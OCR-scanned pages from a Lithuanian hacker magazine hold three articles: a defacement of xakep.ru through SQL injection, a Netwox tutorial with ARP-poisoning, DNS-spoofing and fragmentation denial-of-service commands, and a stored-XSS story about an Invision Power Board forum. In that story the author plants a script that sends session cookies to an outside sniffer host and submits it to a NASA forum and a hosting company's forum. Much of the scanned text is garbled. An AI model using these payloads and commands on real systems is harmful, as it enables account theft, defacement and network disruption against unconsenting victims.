html puslapyje, pasikeitimų aš ten neradau net ir po ilgų 
Ctrl-F5 spaudymų. Staiga prisiminęs, kad rytoj reikia eiti | 
mokykla, nusprendžiau išsimiegoti. Kitą dieną aš pasitariau 
su Zadoxlik'u. Jis pasakė, kad puslapiai kešuojami serveryje. 
Tai labai suprantama ir prasminga: kam kiekvieną karta kreip- 
tis į SOL serverį, kai puslapį galima išsaugoti ir atnaujinti 
tik kartą per keletą valandų. Taip ir čia: lygiai po valandos 
pasirodė atnaujinimai. Užėjęs į tą patį archyvą, aš vietoje 
gražios antraštės „Surask forume 10$“ pamačiau „lala“. 
Teliko patikrinti išvedimo filtraciją, o tada jau galima imtis 
defeiso. Aš pakartojau savo ankstesnius veiksmus, tik vietoje 
„lala“ nepastebimai įterpiau „lala<BR>“ — tai leis patikrinti 
filtravimą. O Zadoxlik paruošė universalų defeiso kodą: 
<img ą=a sic=““ ste=““ style= "background:url(,javasctipt:document. 
wite(Rgvot;Defaced by <b>Za</b>(0 and < b>Z0</b> doxlik. Draugiškas 


nulaužimas =) < br> Sveikinimai: snūw, Kol777, limpompo, Rebz, Dronga, klbūtą, 
mOnzt3r, Green BearRguot;))“ widih--1 height =-1 onEnor "iflthis.sa! ol“) į document. 
writo(,Defaced by <b>Za</b>C0 and < b>-Za</b> doxlik.Šnbsp; Draugiškas 


8nbsp;nulaužimas =) < br > Sveikinimai: snOw, KoT777, limpompo, Rebz, Dronga, klbūrą, 
mOnzt3r, Green Beor');this.s0 "ol"; Į" > 


Puslapį paprasčiausiai perrašinėdavo Java skriptas. Kad nereikėtų 
kankintis su kabutėmis, aš pradinę eilutę su php funkcija bin2hex($s) 
perkodavau į šešioliktainį formatą. Tiems, kas dar nesuprato: 
MSS0L eilutes leidžia perdavinėti šešioliktainiu formatu nenaudojant 
kabučių, t.y. vietoje „lala“ galima perduoti 0x6616c61. Na, o dabar 
imkimės defeiso. Eilinį kartą užėjęs į pagrindinį hakerio puslapį, aš 
nukopijavau publikacijos adresą apie naują nulaužimo konkursą ir 
išgavau filedir reikšmę. Atnaujinęs preview su nauja reikšme, aš 
perkroviau puslapį ir vietoje mėlyno dizaino pamačiau baltą foną, kur 
puikavosi viso labo dvi eilutės, kurias galima pamatyti nuotraukoje. 
Būtent default.asp ir nebuvo kešuojamas. 


[Sleep time] Štai ir visa istorija. Nepamiršk, kad nulaužtas gali būti 
ne tik xakep.ru, bet ir visos gameland svetainės. Siame straipsnyje 
aš nepasakojau apie forumo klaidas, 0 jų yra, ir patikėk, ten ne 
XCC. Patyrinėk — galbūt ir tau nusišypsos laimė. 


— 
"Mozilla Firefox 


Ele Edit View Go Bookmarks Tools Help 


a - P - S 0 V [Ū Neodkaepruldetaut.asp 


1 M nasniaa crpannua F... Bi 3aronoBKH NOcneAH,.. 


bttp://www.xakep.ru/code/ 
common/rateit/opinion new. 
aspžcode opinion ORT116046 
UNION SELECT null,null,null,nul 
L null null str(filedir), preview from 
wpPost where filedir= 28410 
and s(opė = Xpost'-- 


ZL Xakep Online -> Apxns 


/4/ rezultatas 


| 2£ xakep Onine -> |2C 


Defaced by ZaCo and Zadoxlik. ApyxecTBenKnH: A B310M=) 
IlpuBeTH: snOw, KoT777, impompo, Rebz, Dronga, k1bOrg, mOnzt3r, Green Bear 
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FERRUM 


SOFTWARE 


IMPLANT 


Megakombainas 

Praktinio programos „Netwox“ nau- 
dojimo patirtis 

TU VIS DAR NAUDOJIESI KRŪVA 
BRUTFORSERIŲ, SNIFERIŲ, SPOOFERIŲ, 
PAKETŲ GENERATORIŲ IR PRAKTIŠKAI 
DŽENTELMENIŠKU TINKLO KLIENTŲ RIN- 
KINIU? BIČIULI, TU ATSILIKAI NUO GY- 
VENIMO! ŠIANDIEN ATĖJO LAIKAS IŠTRINTI 
TĄ DIDELĘ SAVO SENŲ PROGRAMŲ 
KOLEKCIJĄ IR IŠMOKTI NAUDOTIS MEGA- 
PATOGIA PROGRAMA NETWOX, KURI 


HACK 


SCENA 


= VIENA GALI PAKEISTI VISĄ TAVO KOVINĮ 
Ž ARSENALĄ. 
paso | 
[Kaip viskas prasidėjo] Tai kas gi tas Netwox ir kodėl 
aš apskritai apie jį užsiminiau? Pirmą kartą apie šį įrankį 
aš sužinojau iš pažįstamo admino, kurio kompetencija ir 
patirtis man visada darė įspūdį, tačiau jo vardo paskelbti 
aš nesiryšiu — paskui dar išpuiks. Jis su savimi nuolat 
o tampėsi USB flash kortėlę su Netwox, kurios, beje, turėjo 
= net tris skirtingas versijas, kadangi, priklausomai nuo versi- 
8 jos, į programos sudėtį 


www.digital.net/ 
gandalf šiuo adrėsu 
ponas Gandall  ikurdino 
savo darbo vaisius, ku- 
tiuos aš panaudojou savo 


įeinančių įrankių rink- 
inys smarkiai keitėsi, 
beje, kartais visai ne į 
blogąją pusę. Savaime 
suprantama, sužinojęs 


s 


pavyzdyje apie tokį stebuklingą 

www.laurentconstantin. daiktą aš iš jo pa- 

com oficiali Pio: siskolinau šią programą 

2 gramos Netwox kūrėjo įr pradėjau ja išsijuosęs 
-4 svetainė naudotis, nors ir buvau 
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| Š BŪTINAI PAPA- | 
| S TAIP PAT DARO IR A 
KAvAJIS KAIP JEIGU TU TU SKAITYSI IKI IKI GALO 


kone prisiekęs, kad niekam jos neduosiu ir apie tai nerašysiu Jokių 
straipsnių. Kaip matai, šio savo pažado aš neišpildžiau. Likau 
taip ir nesupratęs, kodėl mano pažįstamas labai nenorėjo, kad 
plačios masės sužinotų apie Netwox, juk tai ne koks nors privatus 
eksploitas ar bekdoras, tačiau jis veikiausiai turėjo priežasčių. 
Sumaniose rankose ši programa virsta žudančiu įrankiu, kuris 
naudingas tiek sistemų administratoriui, tiek ir profesionaliam 
hakeriui arba informacijos saugumo specialistui, tačiau priešingu 
atveju tai gali būti lameriško destruktyvo, floodo ir bukų skriptvaikių 
pasilinksminimų priemonė. 


[Aiškinamės situaciją] Iš tiesų Netwox — ne atskiras irankis, ka 
tu, tikiuosi, jau supratai, o ištisas programų rinkinys: 

* sniff, spo0f 

* įvairūs klientai ir serveriai 

* DNS, FTP HTTP IRC, NNTR SMTR SNMP syslog, telnet, TFTR 
ident, DHCP 

* scan, ping, traceroute, whois 

* kavos virimo aparatas 

Būtent, kavą jis taip pat daro, ir aš būtinai papasakosiu, kaip, jeigu 
tu skaitysi iki galo :). Kad ir kaip bebūtų keista, šio virtuvės komba- 
ino pavadinimas kilęs iš sutrumpinimo Network Toolbox, pagal tai 
atitinkamas ir šios programos simbolis — šaltkalvio įrankių dėžė. 
Straipsnio rašymo metu paskutinė programos versija buvo 5.33.0, 
į jos sudėtį įėjo 221 įrankis. Įspūdinga? 
Tačiau ir tai dar ne viskas. Netwox veikia FreeBSD, Linux, OpenBSD, 
NetBSD, Solaris, HP-UX sistemose, taip pat, be jokios abejonės, 
visose Windows versijose, taip pat ir Win 95, sename mano uni- 
versiteto kompiuteryje :). Be to, programa platinama pagal GPL 
licenciją. Taip pat vargu ar tau verta aiškinti, jog ją tu gali laisvai 
sukompiliuoti turėdamas tam tikrą tvarkyklę ir šiek tiek sumanumo. 
Giliau pakapsčius galima pasakyti, kad Netwox — tai kompleksinio 
iš trijų dalių susidedančio projekto vienetas: 

* netwib (Icrzo) 

* netwox (IcrZzoexX) 

* netwag (RzoBox) 

Visu aukščiau išvardintų dalių versijų numeracija dėl jų neatsie- 
jamumo vienoda. Manau, kad tau jau truputį paaiškėjo, kas yra 
tas Netwox, 0 dabar aš šiek tiek išsamiau papasakosiu apie kitas 
sudedamąsias projekto dalis. 


[Netwib] Netwib — tai pagrinde į programuotojus orientuota tin- 
klo biblioteka, kuri pateikia tinklo adresų transformavimo, paketų 
kodavimo/dešifravimo/spausdinimo, jų spoofingo ir snifinimo funk- 
cijas, realius ir virtualius UDP/TCP klientus ir serverius, duomenų 
transformavimo galimybę, grandininius sarašus ir tarpusavio 
sąveika tarp procesų. 

Priklausomai nuo tavo platformos, Netwib reikalinga libpcap (Www. 
tcpdump.org) arba WinPcap (www.winpcap.org) biblioteka. 


[Netwag]O tai ganėtinai malonus, mano nuomone, nelabai pato- 
gios konsolinės Netwox aplinkos interaktywaus meniu papildymas. 
Ir nors jūs mane už tokį pasakymą užspardysit negyvai, tačiau 


Netwox + console derinys visiškai nevaldo, kadangi jie tarpusavyje 
nesuderinami, ką tu suprasi vos po pirmų darbo minučių. Be 
abejo, dėl skonio nesiginčijama, tačiau vis dėlto. Netwag — tai su 
Tel/Tk kalba parašyta grafinė Netwox aplinka, kuri papildo Netwox 
konsolės galimybes ir leidžia lengvai: 
- atlikti paiešką tarp Netwox įrankių; 
- įrankį paleisti naujame lange arba tekstinėje zonoje; 
- saugoti komandų istoriją; 

keistis duomenimis, panaudojant du vieningus apsikeitimo 
buferius. 
Dėl aukščiau išvardintų priežasčių primygtinai rekomenduoju 
apsirūpinti šiuo džiaugsmu. 


[Įdiegimas] Ką gi, metas išbandyti visus aukščiau išvardintus 
dalykus, tačiau prieš tai reikia juos įdiegti. Padaryti tai paprasčiau 
nei paprasta: įdiegimo paketą pasiimk iš oficialios www.laurent- 
constantin.com svetainės arba iš mūsų disko (netw-ibox-ag- 
5.33.0.tg2). 

Šio archyvo viduje tu rasi keleta katalogų su išeities tekstais ir 
dokumentacija, taip pat dvi įdiegimo bylas — installwindows.exe 
ir installunix.sh, kurių paskirtį nuspėti nesunku. Jeigu tu esi linkęs 
viską daryti konsolėje rankutėmis, tuomet tavo veiksmai susiveda 
į banalų mano išvardintų veiksmų pakartojimą kiekvienai daliai: 


4 cd sr/netw“-srC/SIC 
* /genemoke 

4 make 

4 Ssų 1001 

4 make install 
Ad JIS 


Įdiegimo metu Netwox tylėjo kaip partizanas tardyme, kad nerado 
libnet paketo (jį gali gauti iš čia: www.packetfactory.net/libnet/), 
tačiau tai iš esmės paveikia jo darbingumą, Ly. galimybę konstruoti 
ir spoofinti paketus. Todėl primygtinai rekomenduoju jį parsisiųsti, 
taip pat, jeigu aš tave vis dėlto įtikinau naudotis grafiniu front-end'u, 
pas save įdiek Tc//Tk, kurį gali gauti iš www.tcl.tk/software/tcltk/ ir 
www.activestate.com/Products/ActiveTcl. O su įdiegimu Windows 
sistemoje problemų iškilti neturėtų. 


[Ką gi mes mokame?) Aš nuoširdžiai tikiu, kad tavo vadovaujamas 
Įdiegimas praėjo sklandžiai. Jeigu ne, tuomet siūlyčiau žvilgtelėti 
| dokumentaciją, kurią rasi įdiegimo pakete. RTFM dar niekam 
nepakenkė. O tiems, kas liko, aš pabandysiu parodyti pačias 
skaniausias savybes ir įdomiausius darbo metodus, kuriais galima 
pasinaudoti dirbant sų Netwox. Prisipažinsiu sąžiningai — ši paketą 
megstu net ne už jo įrankių, kurie tau tikrai patiks ir pravers, gausą, 
kiek už puikias įvairių protokolų paketų generavimo ir spoofinimo 
galimybes. Pavyzdžiui, štai tau klausimas: kaip sugeneruoti IPy6 TCP 
paketą ir išsiųsti jį į internetą? „O kam man to reikia?“ paklausi. 
Skubu priminti, kad /Pv4 protokolas dėl savo ribotumo baigia nu- 
gyventi jam skirtą amžių, tai kodėl gi nepaeksperimentavus su tuo 
dabar, jeigu yra tokia galimybė? Be to, mūsų srityje erudicija tikrai ne 
paskutinėje vietoje. Tačiau nenuklyskime į filosofinius pamąstymus. 
Taigi tu turi du kelius: naudotis konsoline navigacija per įrankius 
arba pažangią grafinę vartotojo sąsają. Pirmąjį variantą tu pamatysi, 
konsolėje įvedęs Netwox. Antrąjį — surinkęs Netwag (žiūrėk 
paveikslėlį). Jeigu tu Windows sistemoje pasinaudojai automatiniu 
įdiegimu, tai pagrindiniame meniu rasi nuorodas į abu šiuos įrankius. 
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Apie navigaciją konsolinėje Net- 
wox versijoje galima pasakyti 
tik tiek: džiunglėse labai lengva 
pasiklysti. Tiesą sakant, visa navi- 
gacija susiveda į štai ką: norint 
surasti kokią nors tau reikalingą 
galimybę, reikia pereiti per tave 
dominantį hierarchinį medį iki 


ieškomo įrankio, o po to jį paleisti 
arba interaktyviame parametrų 
įvedimo režime (klavišas K), 
arba nurodžius viską iš karto 
(klavišas R). Antrasis darbo 
* su konsole variantas skirtas 
tiems, kas tiksliai žino, ko ieško: 
tau tiesiog reikia įvesti Netwox 
<įrankio numeris> [parametrų sąrašas]. O grafinė sąsaja visa tai 
leidžia padaryti skyrelyje „Search“, kur po dvigubo paspaudimo ant 
nuorodos Form skyrelyje nurodomi reikiami parametrai (reikalingi 
pažymimi varnele), tada reikia paspausti „Generate“, po to „Run 
It“ ir mėgautis rezultatu. Taigi sugrižkime prie IPv6 TCP paketo. Jį 
sugeneruoti labai paprasta: 


144422449471121 


2 


ne! Nita nes ' , 
Tais vernios sertaias ŽiI Kia 


grafinė Netwox aplinka — Netwag 


Z netwox 142 device „EthO“ --eth-src „00:11:22:33:44:55“ --eth-dst „0:8:9:a: 
bc“ -ip6-stc „Iec0:0:0:1::1“ —ipė-dst „[ec0:0:0:1::27 tcp-stc „1235“ —tcp-dst „80“ 
--tCp-syn 


Paaiškinsiu išsamiau: 142 — įrankio Spoof Ethernetlp6Tcp nu- 
meris, --device — naudojama tinklo plokštė, --eth-src ir --eth- 
dst -— siuntėjo ir gavėjo Ethernet adresai, --ip6-src — siuntėjo 
IPv6 adresas, --ip6-dst — gavėjo IPv6 adresas, --tcp-src Ir 
--tcp-dst — jungtys, --tcp-syn — nustatytos vėliavėlės. Lygiai taip 
pat galima spoofinti ir /Pv4 TCP paketus. Vienintelis skirtumas tas, 
kad tuomet IP adresai bus tau įprastoje keturių baitų formoje, o 
įrankio numeris bus ne 142, 0 34 — Spoof Ethernetlp4 packet. 


[ARP Spoofing] Na, o dabar, kai susipažinome su pagrindiniais Net- 
wox darbo principais, pereikime prie pagrindinės mūsų užsiėmimo 
dalies. Pavyzdžiui, užklausomis užverskime negeranoriško vartotojo 
ARP kešą. Šitaip elgiasi kai kurie DoS'eriai. Tai daroma taip. Iš 
pradžių su įrankiu 33 Display information about an IP address 
or a hostname sužinome jo (atakuojamojo) kompiuterio Ethernet 
adresą. Tada su įrankiu 80 Periodically send ARP replies pradedame 
siųsti užklausas, kas daroma taip: 


netwox 80 --eth 00:11:2F-95-42:F1 --ip 192.168.0.1 --device „EhO“ --eth-dst 0:8:9: 
a:b:c —ip-dst 192.168.1.17 --sleep 500 


Pirmoji adresų grupė yra ta, kuri turi būti neprieinama antra- 
jai grupei. O --sleep 500 reiškia užlaikymą tarp pakartojimų 
milisekundėmis. Manau, čia neturėtų būti nieko nesuprantamo. 


[DNS Spoofingį Užsiimkime rimtesniais reikalais ir paban- 
dykime mašinai su Windows XP pakišti pakeistą DNS serverio 
atsakymą. Tarkim, šiame kompiuteryje nėra jokių kitų ugniasienių, 
išskyrus standartinę Microsoft Internet Connection Firewall, 
kuri sukonfigūruota loginti visus dropped paketus ir sėkmingus 
prisijungimus. Tam tikrą svetainę, pavyzdžiui, www.somewebsite, 
org, norintis aplankyti vartotojas šį adresą įveda Internet Explorer 
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adreso eilutėje. Tada iš var- 
totojo mašinos (tarkim, jos 
adresas bus 192.168.1.1) 
jungties 1026 pasiunčiama 
DNS užklausa į DNS serve- 
rio (tarkim, 192.168.1.254) 
jungti 53. O iš netikro adreso 
10.10.10.1 piktas dėdė Jo- 
nas NetBIOS duomenų pavi- 
dalu pasiunčia suklastotą 
(spoofed) DNS atsakymą, 
kuris atakuojamojo mašinai 
praneša, kad web serverio 
adresas yra 192.168.1.77. 
Iš tikrųjų mašiną su IP adresu 
192.168.1.77 kontroliuoja 
tas pats piktas dėdė Jonas, 
0 pagrindiniame serverio 
puslapyje atėjęs vartotojas 
randa negražų žodį iš trijų raidžių :). Šį Ethereal perimtą NetBIOS 
paketą gali rasti šeštoje nuotraukoje. 

Savaime suprantama, vietoje sniferio būtų galima panaudoti Net- 
wox įrankį, tačiau man to padaryti nepavyko, kadangi rašydamas 
straipsnį aš radau nemalonią ir labai keistą klaidą: Netwox keikėsi 
dėl parametro --filter ir aiškino, kad IP adresas nėra loginis nulis. 
Tiek jau to. Geriau pažiūrėkime, kaip galima sukurti aptariamą 
DNS paketą. Tai padaryti labai paprasta idarbinus tą patį mano 
mylimą Netwox: 


Netwox konsolė langinėse 


netwox 38 --ip4-sic 10.10.10.1 --ip4-ds! 192.168.1.1 --ip4-protocol 17 

—ip4-doto 0089040200440000000385800000000100000000204648455046434544 
45484 

643455046464641434143414341434143414341424c000001000100015180000440 


18014d 


[Proceso automatizavimas] Savaime suprantama, kartais 
tenka automatizuoti darbo su kai kuriomis programomis 
procesą. Jeigu tu naudojiesi *nix tipo sistema, tuomet viskas 
aišku: pasaulį išgelbės per! arba bash skriptai. O ką daryti 
Windows vartotojams? Be jokios abejonės, galima rašyti pake- 
tines „bat bylas, tačiau šis sprendimas ne mums :). Juk tu pas 
save įdiegei TCL, kuris skirtas netwag front-end'o aplinkai? Tai 
ir panaudok visas jo galimybes pagal paskirtį. Tarkim, mums 
reikia gauti informaciją (Ethernet adresą ir vardą) apie kiekvieną 
192.168.0.* potinklio tinklo mazgą — rašome paprastą TCL 
skriptą: 


+£!/ust/hin/wish 
for (set i 0) (Si < 255) (ina i) ( 
puls „Milesting Si“ 
set ipad „192.168.0.5i“ 
if [catch (exec netwox 3 Sipad) data] ( 
puts „Error during exec ; Šdata“ 
> oke ( 
puls Sdata 


oxit 
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Čia neaiškūs parametrai yra --ip4-data ir --ip4-protocol. Pirmojo 
parametro reikšmę gana lengva išsiaiškinti žvilgtelėjus į DNS RFC: 
duomenyse saugomas kaip atsakymas į DNS užklausą grąžinamas 
IP adresas 192.168.1.77. Parametras --ip4-protocol 17 reiškia, 
kad Jonas konstruoja UDP paketą. Antras tokio paketo konstravimo 
būdas man atrodo dar patogesnis. Tam pasinaudok įrankiu 39, 
kuris automatiškai paskaičiuoja paketo kontrolinę sumą: 


netwox 39 —ip4-sc 10.10.10.1 --ip4-dst 192.168.1.1 —udp-st 

--udp-dst 1026 —udp-doto  00038580000000010000000020464845504643454(45 
484 

643455046464641434143414341434143414341424c0000010001000151800004c0 
08014d 


Ką gi mes iš to gauname? Jeigu nelaimingasis atakuojamasis tuo 
momentu žvilgtelėtų į DNS užklausų kešą, tuomet ten pamatytų 
štai ką: 


Wwww.somewebsile.01g 


+ FHEPFCELEHFCEPFFFACACACACACACABL 


Record Type <] 
Time To Live „: 86364 
Data Length. | 4 
Section „+ Answer 


A (Host) Record . + 192.168.1.77 

Štai kokia graudi situacija. Savaime suprantama, toks pavyzdys yra 
grynai teorinis ir jo nevertėtų pritaikyti praktiškai, kadangi tai vargu 
ar patiks mūsų šauniesiems teisėsaugos organams, juo labiau kad 
vykdant šią ataką reikia nuspėti UDP jungties numerį ir transakci- 
jos ID, nors tai ir nėra problematiška. Be to, norint pakeisti mūsų 
paminėtą nelaiminga URL, suklastotą paketą tektų sugeneruoti ne 
vieną, o mažiausiai dešimt kartų. Vis dėlto šiandien mano tikslas 
nėra išsamiai aptarti šį atakavimo metodą, kadangi išsamiau apie 
ji gali sužinoti elektroniniame žurnale Phrack (Nr. 62), straipsnyje 


| le Got yew Go Captue Ansiyte Gaetos beip 


Būsūa B+ A+<+0e7 2 CG AGAL 
Eee (—ilttem |moron| amen | 


b Frame 1 (102 bytes on wLre, 102 bytes captured! 
+ Ethernet II, Src: 00:50:56:C0 00:01. Ost: 00:0<:729:04:74-75 


+ Internet Protocol, Src Addr: 16.10.16.1 [10.10.10.1). Dst Addr 192.168.1.1 (192,.168.11 
" User Datagran Protocol, Src Port 137 (137), Ost Port 1026 '10261 
Source port: 137 (137) 
Destination port 1026 (10261 
Length: 60 
Checksum: 0x0006 (none 
* NetBIOS Name S 
Transactio 
> Flags: 058590 (Name guery response, NG error 
Ouestions 0 
Anšwe: Ns | 
Authority Rs: 0 
Additional RAs. ( 
 Aniwės 
* WORKGROUP<“ 14» type Unknown, Class net 
Name WORKOAGUP« Lb 
Type: unknown 
Class: 1net 
Time to Livo 1 day 
Data length: 4 
Data 
0000 00 0 29 04 7d 25 00 50 56 (0 00 01 08 00 45 00 ja. PY E 
loo10 00 58 bt 58 00 00 06 11 25 89 Oa 04 Oa 01 (0 a AS 


[0020 
[6050 
19040 
[0050 


01 01 06 89 04 62 60 44 60 66 06 63 85 60 00 00 
00 01 00 60 00 60 20 46 44 45 50 46 41 44 Ac 44 
45 46 43 45 56 46 46 46 4] 47 4] 43 41 43 41 41 
41 45 41 45 41 42 ėc 06 60 61 00 61 00 01 51 00 


FMEPFCELĖ 
MFCEPFFFACACACA 
ACACABI 


suklastoto DNS atsakymo perėmimas 


| END OF PROGRAM | 


This version contains 221 tools 
Running "190" 
Tool finished its job 


Netwox kavytė 


„Mistakes in the RFC Guidelines on DNS Spoofing Attacks“. 


[Rose Fragmentation attack] Paskutinį pavyzdį pateiksiu remdama- 
sis Rose Fragmentation atakos metodu, kuri išsamiai apšvietė hakeris 
slapyvardžiu Gandalf. Kadangi man suteikta vieta žurnale ribota, 
išsamiau apie tai paskaityti vertėtų čia: Attp://digital.net/—gandalf/ 
Rose Frag Attack Explained.txt. Papildomai kartu su Netwox mums 
prireiks dar vieno taip pat labai naudingo įrankio — Nemesis (Www. 
packetfactory.net/projects/nemesis). Įdiek jį į C:| disko šaknį (dėl 
viso pikto). Iš anksto susitarkime: tegu A bus atakuojančiojo 
kompiuteris, B — atakuojamas kompiuteris, kuriame veikia 
Windows 2000 su visais papildymų paketais (service packs), o 
jo IP adresas tegu būna 10.32.3.15, C — koks nors pašalinis 
kompiuteris. Tada išsaugojame bylas Picmpdata.txt, Ptopdata.txt 
ir Pudpdata.txt, kurias Gandalf specialiai pakoregavo taip, kad 
būtų galima sukurti tinkamus fragmentuotus paketus. Šias bylas 
visiems protokolams galima rasti čia: 


http://digital.net/— gandal[/Piepdata.txt 
http://digital.net/ — gandalt/Pudpdata.bt 
http//digital.net/ — gandall/Picmpdata.txt 


Mums taip pat prireiks bylos nemITUrnd.xls (http://digital. 
net =gandalf/nemITUrnd.xls). Ją reikia paredaguoti, todėl išskirk 
jame eilutes ir leiskis žemyn tol, kol negausim 700 eilučių. Tada 
gautus duomenis išsaugojame temp.csv vardu (MS-DOS Comma 
Separated Text), po ko juos pervadiname į temp.txt ir atidarome. 
Čia tu pamatysi štai tokią košę: 


nemesis icmp S 10.,3,,64,,121, -D 10323.15 -dl 
tė MO, —,nemesis ip -S 10.,3,.,64,,121, 


18 17242, -P Pianpdata. 
D 10323.15 d! 1 7242, 


BT- Geras.com 


Čia visas tildes („—“) reikia pakeisti į Wn, 0 „„“ — į tarpus, po 
ko išsaugok tekstą ir išeik. Gautą bylą pervadink į temp.bat 
ir įkelk į katalogą su Nemesis. Tada pasinaudokime į Netwox 
sudėtį įeinančiu sniferiu, kurio laimingasis numeris yra 7, ir 
surinkime atsitiktinius paketus, kurių mums prireiks siuntimui 
su Nemesis: 


netwox 7 --oulfile  „nemesispingbig.txt“  --recordencode „hexa“ filter „hosl 
10.323.157 


Šiuo atveju visi surinkti paketai, kurie keliauja į IP adresą 
10.32.3.15, bus šešioliktainėje sistemoje surašyti į bylą neme- 
sispingbig.txt. Toliau atsidarome komandinę eilutę ir surenkame: 
C:Inemesis >temp.bat. Palikę veikiantį Nemesis porai valandų, 
gausime apie 35000 paketų. Jeigu kompiuterio A kanalo greitis 
pakankamai didelis, tai fragmentuotos ICMP užklausos iš kom- 
piuterio C parodys, kad kompiuteris neatsiliepia (ping Reguest 
Time Out). Kai Nemesis baigs savo darbą, kompiuteris B vėl 
pradės rodyti gyvybės požymius. Dabar pabandykime DoS suor- 
ganizuoti kiek kitaip. Visus šiuos paketus išsiųskime su Netwox 
14 — Spoofa record: netwox 14 -s -file nemesispingbig.txt. Ką 
gi mes dabar gauname, paleidę ping -t -1 1600 10.32.3.15? 
Atakuojamasis kompiuteris bus neprieinamas ne mažiau nei 
2-3 minutes. 


[Vietoje pabaigos] Tai ką gi mes turime? Iš tiesų, aptariama 
programa destruktyvaus asmens rankose gali pavirsti baisiu gin- 
klu, nors ji ir buvo kuriama kaip administratorių įrankis, skirtas 
testuoti maršrutizatorius, tinklus ir panašiai, o ne kaip hakeriškų 
įrankių rinkinys. Naudokis Netwox protingai ir nenaudok jo blogais 
tikslais — daugiau pozityvumo, mano drauge. Ir pabaigai noriu 
paminėti, kad savo straip- 
snyje aš daugiausiai nau- 
dojau tik Netwox spooferių ir 
paketų konstruktorių klasės 
įrankius, tačiau tai tik maža 
dalis visų šios programos 
galimybių, juk su Netwox 
nulaužtoje mašinoje gali- 
ma net paleisti backdoorą, 
tereikia surasti nuotolinio 
administravimo įrankį TCP 
server ar HTTP server arba 
paleisti laikiną FTP arba 
SMTP serverį. Tačiau visų 
kitų Netwox galimybių studi- 
jas paliksiu tau. Nebijok, 
jose nėra nieko sudėtingo. 
Ak, taip, tiesa! Pamenu, jog 
žadėjau tau papasakoti, kaip 
su Netwox padaryti kavos. 
Manai, jog tai neįmanoma? 
Ne! Programos kūrėjas Lau- 
rent Constantin nusprendė, 
kad programoje verta pridėti 
ir šią galimybę — paleisk 
Netwox 190 ir po kelių 
sekundžių tavo kava bus 
paruošta. 
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su Netwag snifiname DNS tinklo srautą 
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Invision Power hack 

Didelė populiaraus forumo skylė 

TAU TIKRIAUSIAI TEKO DAUG GIRDĖTI APIE 
TOKIŲ FORUMŲ INDUSTRIJOS MONSTRŲ, 
KAIP IPB, PHPBB IR VBULLETIN KLAIDAS. 
KIEKVIENĄ SAVAITĘ JŲ ATRANDAMA VIS DAU- 
GIAU. ATRODYTŲ, JOG TOKIŲ VARIKLIUKŲ 
SAUGUMAS TURĖTŲ DIDĖTI GEOMETRINE 
PROGRESIJA, TAČIAU VIETOJE TO GAMINTOJAI 
ISLEIDZIA VIS NAUJAS FORUMŲ VERSIJAS, 
TUO PACIU PRIDĖDAMI NAUJAS KLAIDAS. KĄ, 
SAKYSI, KAD NE TAIP? AS PABANDYSIU PAKEISTI 
TAVO NUOMONĘ. 


[Aukos paieškos] Už lango tvyrojo šalta žiemos diena. Eiti į lauką 
visiškai nesinorėjo, todėl aš įsijungiau savo nešiojamąjį kompiuterį. 
ICO praktiškai nieko nebuvo, todėl aš nusprendžiau užsiimti 
naudingu dalyku — klaidų paieška :). Laimė, tuo metu aš turėjau 
archyvą su dešimtimi skirtingų varikliukų, todėl iš karto pradėjau 
„pacientų“ apžiūrą. Laimikis buvo visiškai nedidelis -— viso labo 
pora pasyvių xss. Tačiau staiga aš prisiminiau vieną įžymų forumą, 
kuris pas mane gulėjo atskirame archyve. Tai buvo Invision Power 
Board 2.1.3. 


[Viskas įmanoma] Nuotaika nuo to smarkiai nepagerėjo. 
Greičiausiai šį varikliuką jau testavo šimtai hakerių, todėl surasti 
klaidą bus nelengva. Iš pradžių viskas bylojo būtent apie tai. 
Aš keičiau parametrų reikšmes visur, kur tik įmanoma, į visus 
įmanomus kintamuosius įterpinėjau viengubą kabutę ir stebuklingą 
konstrukciją <script>alert() </script> , tačiau klaidų niekur nebuvo. 
Ir staiga aš radau mygtuką skundo apie pranešimą pasiuntimui. 
Bet kuris ji nuspaudęs vartotojas gali parašyti priežastį, dėl kurios 
jam nepatinka šis pranešimas. Tada toks pranešimas pakliūna 
pas visus forumo moderatorius ir adminus. Mane labai rimtai su- 
domino būtent pastaroji aplinkybė. Aš į pranešimą įterpiau eilutę 
<script>alert() </script > ir už savo atkaklumą buvau apdovan- 
otas: pagaliau išvydau taip ilgai lauktą klaidą. Dabar teliko sukurti 
paprastą sausainukus grobiantį javascript'ą, ką Man gana greitai 
pavyko padaryti: 

„http://antichot.org/s/mysnifl gif?“ + document. 


< script >img — new Image(); img.stc 


cookie; < /sttipt > 


Kaip tu jau tikriausiai supratai, čia nė nebuvo užsimenama apie 
kokią nors filtraciją. Nesuprantu, kaip IPB programuotojai galėjo 
tai praleisti. Atėjo laikas pažeidžiamumą išbandyti praktiškai. 
Gavęs šviežiausių proxy serverių sąrašą, aš mečiausi į kovą. Man 
pasidarė įdomu, ar daug forumų internete turėjo šią klaidą. Laužti 
kažkokius paprastus forumus man nesinorėjo — jeigu jau žaisti, tai 


3anpoc c www.viahost.ru (14.02.2006 18:54) 
IP: 84.246.64.87 
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tik stambiai. Būtent dėl to paieškos sistemoje aš įvedžiau „Powered 
by Invision Power Board site:gov“. 


[Laužiam .gov?] Google pateikė pakankamai daug nuorodų, tačiau 
veikiančios buvo viso labo dvi, kurios abi vedė į NASA serverį. Aš 
užėjau į forumą, užsiregistravau (neretai .g0v zonoje esančiuose 
forumuose registracija draudžiama) ir „pasiskundžiau“ dėl pirmojo 
pasitaikiusio pranešimo. Bukai įterpti vien tik javascript'ą būtų 
per daug rizikinga, todėl aš greitai parašiau, kaip man pačiam 
pasirodė, ganėtinai įtikinamą pranešimą ir nuspaudžiau „Siųsti“. 
Teksto pabaigoje aš lyg netyčia įterpiau šia eilutę: 

<script>img = new Image(); img.sic = „htp;//antichat.arg/s/mysnifl gif?“ + document 
cookie; < /saript?>" 


Praėjo keletas dienų, 0 sausainukų mano pašte vis dar nebuvo. 
Taip išeina, kad adminas spjovė į forumą ir administravimo sky- 
delyje neskaito jam siunčiamų pranešimų. Ką gi, teks paieškoti 
kitų projektų. 

Nieko nelaukęs gūglei sušėriau užklausą „Powered by Invi- 
sion Power Board site:ru“ ir štai aš jau peržiūrinėju puslapį su 
pažeidžiamais resursais. Antroji man pateikta nuoroda vedė į 
„geriausio hostingo“ svetainę www.viahost.ru, Kuri mane rimtai 
sudomino. Aš greitai užsiregistravau ir vėl pasiskundžiau dėl atsi- 
tiktinai pasirinkto pranešimo: 

„Sveiki. Man iškilo vienas klausimas: kokios būtent MySOL ir PHP 
